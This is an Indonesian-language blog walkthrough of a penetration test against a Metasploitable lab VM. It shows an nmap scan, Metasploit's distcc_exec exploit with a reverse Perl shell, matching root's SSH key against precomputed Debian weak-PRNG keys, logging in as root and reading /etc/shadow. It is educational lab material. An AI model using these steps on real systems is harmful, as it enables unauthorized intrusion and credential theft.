November 14, 2011
Monday, November 14, 2011


Beberapa hari yang lalu, saya melakukan penetration testing terhadap software DistCC melalui Metasploit dan sedikit bantuan dari ExploitDB.

Yang diperlukan:
  1. Metasploit Framework (
  2. ExploitDB (
  3. RSA guessable (baca modul untuk mendapatkan link download)

  1. Login DistCC sebagai Daemon
  2. Cari tau RSA key public yang digunakan server
  3. Login sebagai root melalui RSA guessable

root@blue-dragon:~# nmap -sS -sV -p1-65535 -f -n -vv

Starting Nmap 5.61TEST2 ( ) at 2011-11-14 10:01 WIT
NSE: Loaded 11 scripts for scanning.
Initiating ARP Ping Scan at 10:01
Scanning [1 port]
Completed ARP Ping Scan at 10:01, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 10:01
Scanning [65535 ports]
Discovered open port 22/tcp on
Discovered open port 80/tcp on
Discovered open port 53/tcp on
Discovered open port 25/tcp on
Discovered open port 21/tcp on
Discovered open port 3306/tcp on
Discovered open port 23/tcp on
Discovered open port 3632/tcp on
Discovered open port 8180/tcp on
Discovered open port 5432/tcp on
Completed SYN Stealth Scan at 10:01, 9.96s elapsed (65535 total ports)
Initiating Service scan at 10:01
Scanning 10 services on
Completed Service scan at 10:01, 21.02s elapsed (10 services on 1 host)
NSE: Script scanning
NSE: Starting runlevel 1 (of 1) scan.
Nmap scan report for
Host is up (0.00040s latency).
Scanned at 2011-11-14 10:01:00 WIT for 31s
Not shown: 65524 closed ports
21/tcp   open     ftp        ProFTPD 1.3.1
22/tcp   open     ssh        OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open     telnet     Linux telnetd
25/tcp   open     smtp       Postfix smtpd
53/tcp   open     domain     ISC BIND 9.4.2
80/tcp   open     http       Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
3306/tcp open     mysql      MySQL 5.0.51a-3ubuntu5
3632/tcp open     distccd    distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open     postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp filtered ajp13
8180/tcp open     http       Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:3C:99:68 (VMware)
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel

Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 31.36 seconds
           Raw packets sent: 66676 (2.934MB) | Rcvd: 65537 (2.622MB)


Hasil scan membuktikan server memiliki DistCC pada port 3632. Mari kita masuk ssh sebagai daemon dengan bantuan Metasploit (=

root@blue-dragon:~# msfconsole
msf > search distcc
msf > use exploit/unix/misc/distcc_exec
msf  exploit(distcc_exec) > set RHOST
msf  exploit(distcc_exec) > set PAYLOAD cmd/unix/reverse_perl
msf  exploit(distcc_exec) > set LHOST
msf  exploit(distcc_exec) > show options 

Module options (exploit/unix/misc/distcc_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST      yes       The target address
   RPORT  3632             yes       The target port

Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST      yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



msf  exploit(distcc_exec) > exploit 

[*] Started reverse handler on 
[*] Command shell session 1 opened ( -> at 2011-11-14 10:11:41 +0700

uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
ls -lart
total 16
drwxr-xr-x 21 root root 4096 Apr 28  2010 ..
drwxrwxrwt  2 root root 4096 Nov 13 11:04 .X11-unix
drwxrwxrwt  2 root root 4096 Nov 13 11:04 .ICE-unix
drwxrwxrwt  4 root root 4096 Nov 13 11:55 

ls -lart /root
total 32
-rw-r--r--  1 root root  141 Oct 20  2007 .profile
-rw-r--r--  1 root root 2227 Oct 20  2007 .bashrc
-rwx------  1 root root  401 Apr 28  2010
-rw-------  1 root root  187 Apr 28  2010 .lesshst
drwxr-xr-x 21 root root 4096 Apr 28  2010 ..
drwxr-xr-x  3 root root 4096 May 17  2010 .
drwxr-xr-x  2 root root 4096 May 17  2010 .ssh
-rw-------  1 root root  123 Nov 13 11:32 .bash_history
ls -lart /root/.ssh
total 12
drwxr-xr-x 3 root root 4096 May 17  2010 ..
drwxr-xr-x 2 root root 4096 May 17  2010 .
-rw-r--r-- 1 root root  405 May 17  2010 authorized_keys
cat /root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable

Kita mendapatkan kode ini:


Lalu search RSA di ExploitDB:

root@blue-dragon:~# cd /pentest/exploits/exploitdb/
root@blue-dragon:/pentest/exploits/exploitdb# ./searchsploit openssl
 Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
Brute forcer for OpenSSL ASN.1 parsing bugs (<=0.9.6j <=0.9.7b)             /multiple/dos/146.c
Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)             /linux/remote/764.c
OpenSSL < 0.9.7l / 0.9.8d SSLv2 Client Crash Exploit                        /multiple/dos/
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit                      /multiple/remote/5622.txt
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (ruby)               /multiple/remote/5632.rb
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)             /linux/remote/
OpenSSL <= 0.9.8k                                                           /multiple/dos/8720.c
OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit                   /multiple/dos/8873.c
OpenSSL remote DoS                                                          /linux/dos/12334.c
root@blue-dragon:/pentest/exploits/exploitdb# cat platforms/multiple/remote/5622.txt
the debian openssl issue leads that there are only 65.536 possible ssh 
keys generated, cause the only entropy is the pid of the process 
generating the key.

This leads to that the following perl script can be used with the 
precalculated ssh keys to brute force the ssh login. It works if such a 
keys is installed on a non-patched debian or any other system manual 
configured to.

On an unpatched system, which doesn't need to be debian, do the following:

keys provided by HD Moore -

1. Download


Download RSA di:

Extract dan cari RSA-nya.

root@blue-dragon:~/tools/rsa/2048# grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub


Lalu login SSH dengan file .pub tadi.

root@blue-dragon:~/tools/rsa/2048# ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@
Last login: Sun Nov 13 11:31:21 2011 from
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
You have mail.
root@metasploitable:~# uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root@metasploitable:~# cat /etc/issue
Ubuntu 8.04 \n \l

root@metasploitable:~# cat /etc/shadow


Written By
Blue Dragon

Supported By
Red Dragon

0 comment:

Post a Comment

Back to top!